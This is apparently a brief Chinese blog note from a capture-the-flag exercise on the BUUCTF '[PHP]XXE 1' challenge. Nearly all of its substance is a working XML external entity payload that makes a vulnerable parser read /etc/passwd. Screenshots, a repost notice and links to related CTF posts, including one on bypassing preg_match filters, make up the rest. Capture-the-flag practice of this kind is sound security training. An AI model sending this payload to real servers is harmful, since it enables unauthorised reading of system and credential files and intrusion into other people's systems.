<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<root>
<name>&xxe;</name>
</root>
payload
![web*buuctf*[PHP]XXE 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030304533.jpg)
![web*buuctf*[PHP]XXE 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![web*buuctf*[PHP]XXE 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030306924.jpg)
原创文章,作者:254126420,如若转载,请注明出处:https://blog.ytso.com/tech/pnotes/273241.html
web*buuctf*[PHP]XXE 1
•
编程笔记
赞 (0)
取反、异或绕过preg_match()过滤所有字母数字
上一篇
2022年7月10日 03:02
[极客大挑战 2019]PHP
下一篇
2022年7月10日 03:03